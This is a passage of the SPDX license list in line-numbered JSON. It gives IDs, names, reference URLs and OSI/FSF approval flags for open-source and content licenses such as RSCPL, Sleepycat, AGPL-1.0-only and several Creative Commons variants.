1641 ],
1642 "isOsiApproved": true,
1643 "isFsfLibre": true
1644 },
1645 {
1646 "reference": "https://spdx.org/licenses/RSCPL.html",
1647 "isDeprecatedLicenseId": false,
1648 "detailsUrl": "https://spdx.org/licenses/RSCPL.json",
1649 "referenceNumber": 132,
1650 "name": "Ricoh Source Code Public License",
1651 "licenseId": "RSCPL",
1652 "seeAlso": [
1653 "http://wayback.archive.org/web/20060715140826/http://www.risource.org/RPL/RPL-1.0A.shtml",
1654 "https://opensource.org/licenses/RSCPL"
1655 ],
1656 "isOsiApproved": true
1657 },
1658 {
1659 "reference": "https://spdx.org/licenses/Sleepycat.html",
1660 "isDeprecatedLicenseId": false,
1661 "detailsUrl": "https://spdx.org/licenses/Sleepycat.json",
1662 "referenceNumber": 133,
1663 "name": "Sleepycat License",
1664 "licenseId": "Sleepycat",
1665 "seeAlso": [
1666 "https://opensource.org/licenses/Sleepycat"
1667 ],
1668 "isOsiApproved": true,
1669 "isFsfLibre": true
1670 },
1671 {
1672 "reference": "https://spdx.org/licenses/xpp.html",
1673 "isDeprecatedLicenseId": false,
1674 "detailsUrl": "https://spdx.org/licenses/xpp.json",
1675 "referenceNumber": 134,
1676 "name": "XPP License",
1677 "licenseId": "xpp",
1678 "seeAlso": [
1679 "https://fedoraproject.org/wiki/Licensing/xpp"
1680 ],
1681 "isOsiApproved": false
1682 },
1683 {
1684 "reference": "https://spdx.org/licenses/CDLA-Sharing-1.0.html",
1685 "isDeprecatedLicenseId": false,
1686 "detailsUrl": "https://spdx.org/licenses/CDLA-Sharing-1.0.json",
1687 "referenceNumber": 135,
1688 "name": "Community Data License Agreement Sharing 1.0",
1689 "licenseId": "CDLA-Sharing-1.0",
1690 "seeAlso": [
1691 "https://cdla.io/sharing-1-0"
1692 ],
1693 "isOsiApproved": false
1694 },
1695 {
1696 "reference": "https://spdx.org/licenses/ClArtistic.html",
1697 "isDeprecatedLicenseId": false,
1698 "detailsUrl": "https://spdx.org/licenses/ClArtistic.json",
1699 "referenceNumber": 136,
1700 "name": "Clarified Artistic License",
1701 "licenseId": "ClArtistic",
1702 "seeAlso": [
1703 "http://gianluca.dellavedova.org/2011/01/03/clarified-artistic-license/",
1704 "http://www.ncftp.com/ncftp/doc/LICENSE.txt"
1705 ],
1706 "isOsiApproved": false,
1707 "isFsfLibre": true
1708 },
1709 {
1710 "reference": "https://spdx.org/licenses/AGPL-1.0-only.html",
1711 "isDeprecatedLicenseId": false,
1712 "detailsUrl": "https://spdx.org/licenses/AGPL-1.0-only.json",
1713 "referenceNumber": 137,
1714 "name": "Affero General Public License v1.0 only",
1715 "licenseId": "AGPL-1.0-only",
1716 "seeAlso": [
1717 "http://www.affero.org/oagpl.html"
1718 ],
1719 "isOsiApproved": false
1720 },
1721 {
1722 "reference": "https://spdx.org/licenses/CC-BY-3.0-DE.html",
1723 "isDeprecatedLicenseId": false,
1724 "detailsUrl": "https://spdx.org/licenses/CC-BY-3.0-DE.json",
1725 "referenceNumber": 138,
1726 "name": "Creative Commons Attribution 3.0 Germany",
1727 "licenseId": "CC-BY-3.0-DE",
1728 "seeAlso": [
1729 "https://creativecommons.org/licenses/by/3.0/de/legalcode"
1730 ],
1731 "isOsiApproved": false
1732 },
1733 {
1734 "reference": "https://spdx.org/licenses/AFL-2.0.html",
1735 "isDeprecatedLicenseId": false,
1736 "detailsUrl": "https://spdx.org/licenses/AFL-2.0.json",
1737 "referenceNumber": 139,
1738 "name": "Academic Free License v2.0",
1739 "licenseId": "AFL-2.0",
1740 "seeAlso": [
1741 "http://wayback.archive.org/web/20060924134533/http://www.opensource.org/licenses/afl-2.0.txt"
1742 ],
1743 "isOsiApproved": true,
1744 "isFsfLibre": true
1745 },
1746 {
1747 "reference": "https://spdx.org/licenses/Intel.html",
1748 "isDeprecatedLicenseId": false,
1749 "detailsUrl": "https://spdx.org/licenses/Intel.json",
1750 "referenceNumber": 140,
1751 "name": "Intel Open Source License",
1752 "licenseId": "Intel",
1753 "seeAlso": [
1754 "https://opensource.org/licenses/Intel"
1755 ],
1756 "isOsiApproved": true,
1757 "isFsfLibre": true
1758 },
1759 {
1760 "reference": "https://spdx.org/licenses/GFDL-1.1-no-invariants-or-later.html",
1761 "isDeprecatedLicenseId": false,
1762 "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-no-invariants-or-later.json",
1763 "referenceNumber": 141,
1764 "name": "GNU Free Documentation License v1.1 or later - no invariants",
1765 "licenseId": "GFDL-1.1-no-invariants-or-later",
1766 "seeAlso": [
1767 "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
1768 ],
1769 "isOsiApproved": false
1770 },
1771 {
1772 "reference": "https://spdx.org/licenses/APAFML.html",
1773 "isDeprecatedLicenseId": false,
1774 "detailsUrl": "https://spdx.org/licenses/APAFML.json",
1775 "referenceNumber": 142,
1776 "name": "Adobe Postscript AFM License",
1777 "licenseId": "APAFML",
1778 "seeAlso": [
1779 "https://fedoraproject.org/wiki/Licensing/AdobePostscriptAFM"
1780 ],
1781 "isOsiApproved": false
1782 },
1783 {
1784 "reference": "https://spdx.org/licenses/GFDL-1.2.html",
1785 "isDeprecatedLicenseId": true,
1786 "detailsUrl": "https://spdx.org/licenses/GFDL-1.2.json",
1787 "referenceNumber": 143,
1788 "name": "GNU Free Documentation License v1.2",
1789 "licenseId": "GFDL-1.2",
1790 "seeAlso": [
1791 "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
1792 ],
1793 "isOsiApproved": false,
1794 "isFsfLibre": true
1795 },
1796 {
1797 "reference": "https://spdx.org/licenses/SISSL.html",
1798 "isDeprecatedLicenseId": false,
1799 "detailsUrl": "https://spdx.org/licenses/SISSL.json",
1800 "referenceNumber": 144,
1801 "name": "Sun Industry Standards Source License v1.1",
1802 "licenseId": "SISSL",
1803 "seeAlso": [
1804 "http://www.openoffice.org/licenses/sissl_license.html",
1805 "https://opensource.org/licenses/SISSL"
1806 ],
1807 "isOsiApproved": true,
1808 "isFsfLibre": true
1809 },
1810 {
1811 "reference": "https://spdx.org/licenses/Naumen.html",
1812 "isDeprecatedLicenseId": false,
1813 "detailsUrl": "https://spdx.org/licenses/Naumen.json",
1814 "referenceNumber": 145,
1815 "name": "Naumen Public License",
1816 "licenseId": "Naumen",
1817 "seeAlso": [
1818 "https://opensource.org/licenses/Naumen"
1819 ],
1820 "isOsiApproved": true
1821 },
1822 {
1823 "reference": "https://spdx.org/licenses/HTMLTIDY.html",
1824 "isDeprecatedLicenseId": false,
1825 "detailsUrl": "https://spdx.org/licenses/HTMLTIDY.json",
1826 "referenceNumber": 146,
1827 "name": "HTML Tidy License",
1828 "licenseId": "HTMLTIDY",
1829 "seeAlso": [
1830 "https://github.com/htacg/tidy-html5/blob/next/README/LICENSE.md"
1831 ],
1832 "isOsiApproved": false
1833 },
1834 {
1835 "reference": "https://spdx.org/licenses/OLDAP-2.8.html",
1836 "isDeprecatedLicenseId": false,
1837 "detailsUrl": "https://spdx.org/licenses/OLDAP-2.8.json",
1838 "referenceNumber": 147,
1839 "name": "Open LDAP Public License v2.8",
1840 "licenseId": "OLDAP-2.8",
1841 "seeAlso": [
1842 "http://www.openldap.org/software/release/license.html"
1843 ],
1844 "isOsiApproved": true
1845 },
1846 {
1847 "reference": "https://spdx.org/licenses/blessing.html",
1848 "isDeprecatedLicenseId": false,
1849 "detailsUrl": "https://spdx.org/licenses/blessing.json",
1850 "referenceNumber": 148,
1851 "name": "SQLite Blessing",
1852 "licenseId": "blessing",
1853 "seeAlso": [
1854 "https://www.sqlite.org/src/artifact/e33a4df7e32d742a?ln\u003d4-9",
1855 "https://sqlite.org/src/artifact/df5091916dbb40e6"
1856 ],
1857 "isOsiApproved": false
1858 },
1859 {
1860 "reference": "https://spdx.org/licenses/CC-BY-ND-2.0.html",
1861 "isDeprecatedLicenseId": false,
1862 "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-2.0.json",
1863 "referenceNumber": 149,
1864 "name": "Creative Commons Attribution No Derivatives 2.0 Generic",
1865 "licenseId": "CC-BY-ND-2.0",
1866 "seeAlso": [
1867 "https://creativecommons.org/licenses/by-nd/2.0/legalcode"
1868 ],
1869 "isOsiApproved": false
1870 },
1871 {
1872 "reference": "https://spdx.org/licenses/OGTSL.html",
1873 "isDeprecatedLicenseId": false,
1874 "detailsUrl": "https://spdx.org/licenses/OGTSL.json",
1875 "referenceNumber": 150,
1876 "name": "Open Group Test Suite License",
1877 "licenseId": "OGTSL",
1878 "seeAlso": [
1879 "http://www.opengroup.org/testing/downloads/The_Open_Group_TSL.txt",
1880 "https://opensource.org/licenses/OGTSL"
1881 ],
1882 "isOsiApproved": true
1883 },
1884 {
1885 "reference": "https://spdx.org/licenses/LGPL-2.0-or-later.html",
1886 "isDeprecatedLicenseId": false,
1887 "detailsUrl": "https://spdx.org/licenses/LGPL-2.0-or-later.json",
1888 "referenceNumber": 151,
1889 "name": "GNU Library General Public License v2 or later",
1890 "licenseId": "LGPL-2.0-or-later",
1891 "seeAlso": [
1892 "https://www.gnu.org/licenses/old-licenses/lgpl-2.0-standalone.html"
1893 ],
1894 "isOsiApproved": true
1895 },
1896 {
1897 "reference": "https://spdx.org/licenses/Parity-7.0.0.html",
1898 "isDeprecatedLicenseId": false,
1899 "detailsUrl": "https://spdx.org/licenses/Parity-7.0.0.json",
1900 "referenceNumber": 152,
1901 "name": "The Parity Public License 7.0.0",
1902 "licenseId": "Parity-7.0.0",
1903 "seeAlso": [
1904 "https://paritylicense.com/versions/7.0.0.html"
1905 ],
1906 "isOsiApproved": false
1907 },
1908 {
1909 "reference": "https://spdx.org/licenses/CC-BY-ND-1.0.html",
1910 "isDeprecatedLicenseId": false,
1911 "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-1.0.json",
1912 "referenceNumber": 153,
1913 "name": "Creative Commons Attribution No Derivatives 1.0 Generic",
1914 "licenseId": "CC-BY-ND-1.0",
1915 "seeAlso": [
1916 "https://creativecommons.org/licenses/by-nd/1.0/legalcode"
1917 ],
1918 "isOsiApproved": false
1919 },
1920 {
1921 "reference": "https://spdx.org/licenses/dvipdfm.html",
1922 "isDeprecatedLicenseId": false,
1923 "detailsUrl": "https://spdx.org/licenses/dvipdfm.json",
1924 "referenceNumber": 154,
1925 "name": "dvipdfm License",
1926 "licenseId": "dvipdfm",
1927 "seeAlso": [
1928 "https://fedoraproject.org/wiki/Licensing/dvipdfm"
1929 ],
1930 "isOsiApproved": false
1931 },
1932 {
1933 "reference": "https://spdx.org/licenses/CNRI-Python.html",
1934 "isDeprecatedLicenseId": false,
1935 "detailsUrl": "https://spdx.org/licenses/CNRI-Python.json",
1936 "referenceNumber": 155,
1937 "name": "CNRI Python License",
1938 "licenseId": "CNRI-Python",
1939 "seeAlso": [
1940 "https://opensource.org/licenses/CNRI-Python"
1941 ],
1942 "isOsiApproved": true
1943 },
1944 {
1945 "reference": "https://spdx.org/licenses/BSD-4-Clause-UC.html",
1946 "isDeprecatedLicenseId": false,
1947 "detailsUrl": "https://spdx.org/licenses/BSD-4-Clause-UC.json",
1948 "referenceNumber": 156,
1949 "name": "BSD-4-Clause (University of California-Specific)",
1950 "licenseId": "BSD-4-Clause-UC",
1951 "seeAlso": [
1952 "http://www.freebsd.org/copyright/license.html"
1953 ],
1954 "isOsiApproved": false
1955 },
1956 {
1957 "reference": "https://spdx.org/licenses/NLOD-1.0.html",
1958 "isDeprecatedLicenseId": false,
1959 "detailsUrl": "https://spdx.org/licenses/NLOD-1.0.json",
1960 "referenceNumber": 157,
1961 "name": "Norwegian Licence for Open Government Data (NLOD) 1.0",
1962 "licenseId": "NLOD-1.0",
1963 "seeAlso": [
1964 "http://data.norge.no/nlod/en/1.0"
1965 ],
1966 "isOsiApproved": false
1967 },
1968 {
1969 "reference": "https://spdx.org/licenses/MS-RL.html",
1970 "isDeprecatedLicenseId": false,
1971 "detailsUrl": "https://spdx.org/licenses/MS-RL.json",
1972 "referenceNumber": 158,
1973 "name": "Microsoft Reciprocal License",
1974 "licenseId": "MS-RL",
1975 "seeAlso": [
1976 "http://www.microsoft.com/opensource/licenses.mspx",
1977 "https://opensource.org/licenses/MS-RL"
1978 ],
1979 "isOsiApproved": true,
1980 "isFsfLibre": true
1981 },
1982 {
1983 "reference": "https://spdx.org/licenses/CC-BY-NC-SA-4.0.html",
1984 "isDeprecatedLicenseId": false,
1985 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-4.0.json",
1986 "referenceNumber": 159,
1987 "name": "Creative Commons Attribution Non Commercial Share Alike 4.0 International",
1988 "licenseId": "CC-BY-NC-SA-4.0",
1989 "seeAlso": [
1990 "https://creativecommons.org/licenses/by-nc-sa/4.0/legalcode"
1991 ],
1992 "isOsiApproved": false
1993 },
1994 {
1995 "reference": "https://spdx.org/licenses/HaskellReport.html",
1996 "isDeprecatedLicenseId": false,
1997 "detailsUrl": "https://spdx.org/licenses/HaskellReport.json",
1998 "referenceNumber": 160,
1999 "name": "Haskell Language Report License",
2000 "licenseId": "HaskellReport",
2001 "seeAlso": [
2002 "https://fedoraproject.org/wiki/Licensing/Haskell_Language_Report_License"
2003 ],
2004 "isOsiApproved": false
2005 },
2006 {
2007 "reference": "https://spdx.org/licenses/CC-BY-1.0.html",
2008 "isDeprecatedLicenseId": false,
2009 "detailsUrl": "https://spdx.org/licenses/CC-BY-1.0.json",
2010 "referenceNumber": 161,
2011 "name": "Creative Commons Attribution 1.0 Generic",
2012 "licenseId": "CC-BY-1.0",
2013 "seeAlso": [
2014 "https://creativecommons.org/licenses/by/1.0/legalcode"
2015 ],
2016 "isOsiApproved": false
2017 },
2018 {
2019 "reference": "https://spdx.org/licenses/UCL-1.0.html",
2020 "isDeprecatedLicenseId": false,
2021 "detailsUrl": "https://spdx.org/licenses/UCL-1.0.json",
2022 "referenceNumber": 162,
2023 "name": "Upstream Compatibility License v1.0",
2024 "licenseId": "UCL-1.0",
2025 "seeAlso": [
2026 "https://opensource.org/licenses/UCL-1.0"
2027 ],
2028 "isOsiApproved": true
2029 },
2030 {
2031 "reference": "https://spdx.org/licenses/Mup.html",
2032 "isDeprecatedLicenseId": false,
2033 "detailsUrl": "https://spdx.org/licenses/Mup.json",
2034 "referenceNumber": 163,
2035 "name": "Mup License",
2036 "licenseId": "Mup",
2037 "seeAlso": [
2038 "https://fedoraproject.org/wiki/Licensing/Mup"
2039 ],
2040 "isOsiApproved": false
2041 },
2042 {
2043 "reference": "https://spdx.org/licenses/SMPPL.html",
2044 "isDeprecatedLicenseId": false,
2045 "detailsUrl": "https://spdx.org/licenses/SMPPL.json",
2046 "referenceNumber": 164,
2047 "name": "Secure Messaging Protocol Public License",
2048 "licenseId": "SMPPL",
2049 "seeAlso": [
2050 "https://github.com/dcblake/SMP/blob/master/Documentation/License.txt"
2051 ],
2052 "isOsiApproved": false
2053 },
2054 {
2055 "reference": "https://spdx.org/licenses/PHP-3.0.html",
2056 "isDeprecatedLicenseId": false,
2057 "detailsUrl": "https://spdx.org/licenses/PHP-3.0.json",
2058 "referenceNumber": 165,
2059 "name": "PHP License v3.0",
2060 "licenseId": "PHP-3.0",
2061 "seeAlso": [
2062 "http://www.php.net/license/3_0.txt",
2063 "https://opensource.org/licenses/PHP-3.0"
2064 ],
2065 "isOsiApproved": true
2066 },
2067 {
2068 "reference": "https://spdx.org/licenses/GL2PS.html",
2069 "isDeprecatedLicenseId": false,
2070 "detailsUrl": "https://spdx.org/licenses/GL2PS.json",
2071 "referenceNumber": 166,
2072 "name": "GL2PS License",
2073 "licenseId": "GL2PS",
2074 "seeAlso": [
2075 "http://www.geuz.org/gl2ps/COPYING.GL2PS"
2076 ],
2077 "isOsiApproved": false
2078 },
2079 {
2080 "reference": "https://spdx.org/licenses/CrystalStacker.html",
2081 "isDeprecatedLicenseId": false,
2082 "detailsUrl": "https://spdx.org/licenses/CrystalStacker.json",
2083 "referenceNumber": 167,
2084 "name": "CrystalStacker License",
2085 "licenseId": "CrystalStacker",
2086 "seeAlso": [
2087 "https://fedoraproject.org/wiki/Licensing:CrystalStacker?rd\u003dLicensing/CrystalStacker"
2088 ],
2089 "isOsiApproved": false
2090 },
2091 {
2092 "reference": "https://spdx.org/licenses/W3C-20150513.html",
2093 "isDeprecatedLicenseId": false,
2094 "detailsUrl": "https://spdx.org/licenses/W3C-20150513.json",
2095 "referenceNumber": 168,
2096 "name": "W3C Software Notice and Document License (2015-05-13)",
2097 "licenseId": "W3C-20150513",
2098 "seeAlso": [
2099 "https://www.w3.org/Consortium/Legal/2015/copyright-software-and-document"
2100 ],
2101 "isOsiApproved": false
2102 },
2103 {
2104 "reference": "https://spdx.org/licenses/NIST-PD-fallback.html",
2105 "isDeprecatedLicenseId": false,
2106 "detailsUrl": "https://spdx.org/licenses/NIST-PD-fallback.json",
2107 "referenceNumber": 169,
2108 "name": "NIST Public Domain Notice with license fallback",
2109 "licenseId": "NIST-PD-fallback",
2110 "seeAlso": [
2111 "https://github.com/usnistgov/jsip/blob/59700e6926cbe96c5cdae897d9a7d2656b42abe3/LICENSE",
2112 "https://github.com/usnistgov/fipy/blob/86aaa5c2ba2c6f1be19593c5986071cf6568cc34/LICENSE.rst"
2113 ],
2114 "isOsiApproved": false
2115 },
2116 {
2117 "reference": "https://spdx.org/licenses/OGL-UK-1.0.html",
2118 "isDeprecatedLicenseId": false,
2119 "detailsUrl": "https://spdx.org/licenses/OGL-UK-1.0.json",
2120 "referenceNumber": 170,
2121 "name": "Open Government Licence v1.0",
2122 "licenseId": "OGL-UK-1.0",
2123 "seeAlso": [
2124 "http://www.nationalarchives.gov.uk/doc/open-government-licence/version/1/"
2125 ],
2126 "isOsiApproved": false
2127 },
2128 {
2129 "reference": "https://spdx.org/licenses/CPL-1.0.html",
2130 "isDeprecatedLicenseId": false,
2131 "detailsUrl": "https://spdx.org/licenses/CPL-1.0.json",
2132 "referenceNumber": 171,
2133 "name": "Common Public License 1.0",
2134 "licenseId": "CPL-1.0",
2135 "seeAlso": [
2136 "https://opensource.org/licenses/CPL-1.0"
2137 ],
2138 "isOsiApproved": true,
2139 "isFsfLibre": true
2140 },
2141 {
2142 "reference": "https://spdx.org/licenses/LGPL-2.1-only.html",
2143 "isDeprecatedLicenseId": false,
2144 "detailsUrl": "https://spdx.org/licenses/LGPL-2.1-only.json",
2145 "referenceNumber": 172,
2146 "name": "GNU Lesser General Public License v2.1 only",
2147 "licenseId": "LGPL-2.1-only",
2148 "seeAlso": [
2149 "https://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html",
2150 "https://opensource.org/licenses/LGPL-2.1"
2151 ],
2152 "isOsiApproved": true,
2153 "isFsfLibre": true
2154 },
2155 {
2156 "reference": "https://spdx.org/licenses/ZPL-2.0.html",
2157 "isDeprecatedLicenseId": false,
2158 "detailsUrl": "https://spdx.org/licenses/ZPL-2.0.json",
2159 "referenceNumber": 173,
2160 "name": "Zope Public License 2.0",
2161 "licenseId": "ZPL-2.0",
2162 "seeAlso": [
2163 "http://old.zope.org/Resources/License/ZPL-2.0",
2164 "https://opensource.org/licenses/ZPL-2.0"
2165 ],
2166 "isOsiApproved": true,
2167 "isFsfLibre": true
2168 },
2169 {
2170 "reference": "https://spdx.org/licenses/Frameworx-1.0.html",
2171 "isDeprecatedLicenseId": false,
2172 "detailsUrl": "https://spdx.org/licenses/Frameworx-1.0.json",
2173 "referenceNumber": 174,
2174 "name": "Frameworx Open License 1.0",
2175 "licenseId": "Frameworx-1.0",
2176 "seeAlso": [
2177 "https://opensource.org/licenses/Frameworx-1.0"
2178 ],
2179 "isOsiApproved": true
2180 },
2181 {
2182 "reference": "https://spdx.org/licenses/AGPL-3.0-only.html",
2183 "isDeprecatedLicenseId": false,
2184 "detailsUrl": "https://spdx.org/licenses/AGPL-3.0-only.json",
2185 "referenceNumber": 175,
2186 "name": "GNU Affero General Public License v3.0 only",
2187 "licenseId": "AGPL-3.0-only",
2188 "seeAlso": [
2189 "https://www.gnu.org/licenses/agpl.txt",
2190 "https://opensource.org/licenses/AGPL-3.0"
2191 ],
2192 "isOsiApproved": true,
2193 "isFsfLibre": true
2194 },
2195 {
2196 "reference": "https://spdx.org/licenses/DRL-1.0.html",
2197 "isDeprecatedLicenseId": false,
2198 "detailsUrl": "https://spdx.org/licenses/DRL-1.0.json",
2199 "referenceNumber": 176,
2200 "name": "Detection Rule License 1.0",
2201 "licenseId": "DRL-1.0",
2202 "seeAlso": [
2203 "https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md"
2204 ],
2205 "isOsiApproved": false
2206 },
2207 {
2208 "reference": "https://spdx.org/licenses/EFL-2.0.html",
2209 "isDeprecatedLicenseId": false,
2210 "detailsUrl": "https://spdx.org/licenses/EFL-2.0.json",
2211 "referenceNumber": 177,
2212 "name": "Eiffel Forum License v2.0",
2213 "licenseId": "EFL-2.0",
2214 "seeAlso": [
2215 "http://www.eiffel-nice.org/license/eiffel-forum-license-2.html",
2216 "https://opensource.org/licenses/EFL-2.0"
2217 ],
2218 "isOsiApproved": true,
2219 "isFsfLibre": true
2220 },
2221 {
2222 "reference": "https://spdx.org/licenses/Spencer-99.html",
2223 "isDeprecatedLicenseId": false,
2224 "detailsUrl": "https://spdx.org/licenses/Spencer-99.json",
2225 "referenceNumber": 178,
2226 "name": "Spencer License 99",
2227 "licenseId": "Spencer-99",
2228 "seeAlso": [
2229 "http://www.opensource.apple.com/source/tcl/tcl-5/tcl/generic/regfronts.c"
2230 ],
2231 "isOsiApproved": false
2232 },
2233 {
2234 "reference": "https://spdx.org/licenses/CAL-1.0-Combined-Work-Exception.html",
2235 "isDeprecatedLicenseId": false,
2236 "detailsUrl": "https://spdx.org/licenses/CAL-1.0-Combined-Work-Exception.json",
2237 "referenceNumber": 179,
2238 "name": "Cryptographic Autonomy License 1.0 (Combined Work Exception)",
2239 "licenseId": "CAL-1.0-Combined-Work-Exception",
2240 "seeAlso": [
2241 "http://cryptographicautonomylicense.com/license-text.html",
2242 "https://opensource.org/licenses/CAL-1.0"
2243 ],
2244 "isOsiApproved": true
2245 },
2246 {
2247 "reference": "https://spdx.org/licenses/GFDL-1.1-invariants-only.html",
2248 "isDeprecatedLicenseId": false,
2249 "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-invariants-only.json",
2250 "referenceNumber": 180,
2251 "name": "GNU Free Documentation License v1.1 only - invariants",
2252 "licenseId": "GFDL-1.1-invariants-only",
2253 "seeAlso": [
2254 "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
2255 ],
2256 "isOsiApproved": false
2257 },
2258 {
2259 "reference": "https://spdx.org/licenses/TCL.html",
2260 "isDeprecatedLicenseId": false,
2261 "detailsUrl": "https://spdx.org/licenses/TCL.json",
2262 "referenceNumber": 181,
2263 "name": "TCL/TK License",
2264 "licenseId": "TCL",
2265 "seeAlso": [
2266 "http://www.tcl.tk/software/tcltk/license.html",
2267 "https://fedoraproject.org/wiki/Licensing/TCL"
2268 ],
2269 "isOsiApproved": false
2270 },
2271 {
2272 "reference": "https://spdx.org/licenses/SHL-0.5.html",
2273 "isDeprecatedLicenseId": false,
2274 "detailsUrl": "https://spdx.org/licenses/SHL-0.5.json",
2275 "referenceNumber": 182,
2276 "name": "Solderpad Hardware License v0.5",
2277 "licenseId": "SHL-0.5",
2278 "seeAlso": [
2279 "https://solderpad.org/licenses/SHL-0.5/"
2280 ],
2281 "isOsiApproved": false
2282 },
2283 {
2284 "reference": "https://spdx.org/licenses/OFL-1.0-RFN.html",
2285 "isDeprecatedLicenseId": false,
2286 "detailsUrl": "https://spdx.org/licenses/OFL-1.0-RFN.json",
2287 "referenceNumber": 183,
2288 "name": "SIL Open Font License 1.0 with Reserved Font Name",
2289 "licenseId": "OFL-1.0-RFN",
2290 "seeAlso": [
2291 "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL10_web"
2292 ],
2293 "isOsiApproved": false
2294 },
2295 {
2296 "reference": "https://spdx.org/licenses/LGPL-2.0.html",
2297 "isDeprecatedLicenseId": true,
2298 "detailsUrl": "https://spdx.org/licenses/LGPL-2.0.json",
2299 "referenceNumber": 184,
2300 "name": "GNU Library General Public License v2 only",
2301 "licenseId": "LGPL-2.0",
2302 "seeAlso": [
2303 "https://www.gnu.org/licenses/old-licenses/lgpl-2.0-standalone.html"
2304 ],
2305 "isOsiApproved": true
2306 },
2307 {
2308 "reference": "https://spdx.org/licenses/CERN-OHL-W-2.0.html",
2309 "isDeprecatedLicenseId": false,
2310 "detailsUrl": "https://spdx.org/licenses/CERN-OHL-W-2.0.json",
2311 "referenceNumber": 185,
2312 "name": "CERN Open Hardware Licence Version 2 - Weakly Reciprocal",
2313 "licenseId": "CERN-OHL-W-2.0",
2314 "seeAlso": [
2315 "https://www.ohwr.org/project/cernohl/wikis/Documents/CERN-OHL-version-2"
2316 ],
2317 "isOsiApproved": true
2318 },
2319 {
2320 "reference": "https://spdx.org/licenses/Glide.html",
2321 "isDeprecatedLicenseId": false,
2322 "detailsUrl": "https://spdx.org/licenses/Glide.json",
2323 "referenceNumber": 186,
2324 "name": "3dfx Glide License",
2325 "licenseId": "Glide",
2326 "seeAlso": [
2327 "http://www.users.on.net/~triforce/glidexp/COPYING.txt"
2328 ],
2329 "isOsiApproved": false
2330 },
2331 {
2332 "reference": "https://spdx.org/licenses/mpich2.html",
2333 "isDeprecatedLicenseId": false,
2334 "detailsUrl": "https://spdx.org/licenses/mpich2.json",
2335 "referenceNumber": 187,
2336 "name": "mpich2 License",
2337 "licenseId": "mpich2",
2338 "seeAlso": [
2339 "https://fedoraproject.org/wiki/Licensing/MIT"
2340 ],
2341 "isOsiApproved": false
2342 },
2343 {
2344 "reference": "https://spdx.org/licenses/psutils.html",
2345 "isDeprecatedLicenseId": false,
2346 "detailsUrl": "https://spdx.org/licenses/psutils.json",
2347 "referenceNumber": 188,
2348 "name": "psutils License",
2349 "licenseId": "psutils",
2350 "seeAlso": [
2351 "https://fedoraproject.org/wiki/Licensing/psutils"
2352 ],
2353 "isOsiApproved": false
2354 },
2355 {
2356 "reference": "https://spdx.org/licenses/SPL-1.0.html",
2357 "isDeprecatedLicenseId": false,
2358 "detailsUrl": "https://spdx.org/licenses/SPL-1.0.json",
2359 "referenceNumber": 189,
2360 "name": "Sun Public License v1.0",
2361 "licenseId": "SPL-1.0",
2362 "seeAlso": [
2363 "https://opensource.org/licenses/SPL-1.0"
2364 ],
2365 "isOsiApproved": true,
2366 "isFsfLibre": true
2367 },
2368 {
2369 "reference": "https://spdx.org/licenses/Apache-1.1.html",
2370 "isDeprecatedLicenseId": false,
2371 "detailsUrl": "https://spdx.org/licenses/Apache-1.1.json",
2372 "referenceNumber": 190,
2373 "name": "Apache License 1.1",
2374 "licenseId": "Apache-1.1",
2375 "seeAlso": [
2376 "http://apache.org/licenses/LICENSE-1.1",
2377 "https://opensource.org/licenses/Apache-1.1"
2378 ],
2379 "isOsiApproved": true,
2380 "isFsfLibre": true
2381 },
2382 {
2383 "reference": "https://spdx.org/licenses/CC-BY-ND-4.0.html",
2384 "isDeprecatedLicenseId": false,
2385 "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-4.0.json",
2386 "referenceNumber": 191,
2387 "name": "Creative Commons Attribution No Derivatives 4.0 International",
2388 "licenseId": "CC-BY-ND-4.0",
2389 "seeAlso": [
2390 "https://creativecommons.org/licenses/by-nd/4.0/legalcode"
2391 ],
2392 "isOsiApproved": false
2393 },
2394 {
2395 "reference": "https://spdx.org/licenses/FreeBSD-DOC.html",
2396 "isDeprecatedLicenseId": false,
2397 "detailsUrl": "https://spdx.org/licenses/FreeBSD-DOC.json",
2398 "referenceNumber": 192,
2399 "name": "FreeBSD Documentation License",
2400 "licenseId": "FreeBSD-DOC",
2401 "seeAlso": [
2402 "https://www.freebsd.org/copyright/freebsd-doc-license/"
2403 ],
2404 "isOsiApproved": false
2405 },
2406 {
2407 "reference": "https://spdx.org/licenses/SCEA.html",
2408 "isDeprecatedLicenseId": false,
2409 "detailsUrl": "https://spdx.org/licenses/SCEA.json",
2410 "referenceNumber": 193,
2411 "name": "SCEA Shared Source License",
2412 "licenseId": "SCEA",
2413 "seeAlso": [
2414 "http://research.scea.com/scea_shared_source_license.html"
2415 ],
2416 "isOsiApproved": false
2417 },
2418 {
2419 "reference": "https://spdx.org/licenses/Latex2e.html",
2420 "isDeprecatedLicenseId": false,
2421 "detailsUrl": "https://spdx.org/licenses/Latex2e.json",
2422 "referenceNumber": 194,
2423 "name": "Latex2e License",
2424 "licenseId": "Latex2e",
2425 "seeAlso": [
2426 "https://fedoraproject.org/wiki/Licensing/Latex2e"
2427 ],
2428 "isOsiApproved": false
2429 },
2430 {
2431 "reference": "https://spdx.org/licenses/Artistic-1.0-cl8.html",
2432 "isDeprecatedLicenseId": false,
2433 "detailsUrl": "https://spdx.org/licenses/Artistic-1.0-cl8.json",
2434 "referenceNumber": 195,
2435 "name": "Artistic License 1.0 w/clause 8",
2436 "licenseId": "Artistic-1.0-cl8",
2437 "seeAlso": [
2438 "https://opensource.org/licenses/Artistic-1.0"
2439 ],
2440 "isOsiApproved": true
2441 },
2442 {
2443 "reference": "https://spdx.org/licenses/SGI-B-1.1.html",
2444 "isDeprecatedLicenseId": false,
2445 "detailsUrl": "https://spdx.org/licenses/SGI-B-1.1.json",
2446 "referenceNumber": 196,
2447 "name": "SGI Free Software License B v1.1",
2448 "licenseId": "SGI-B-1.1",
2449 "seeAlso": [
2450 "http://oss.sgi.com/projects/FreeB/"
2451 ],
2452 "isOsiApproved": false
2453 },
2454 {
2455 "reference": "https://spdx.org/licenses/NRL.html",
2456 "isDeprecatedLicenseId": false,
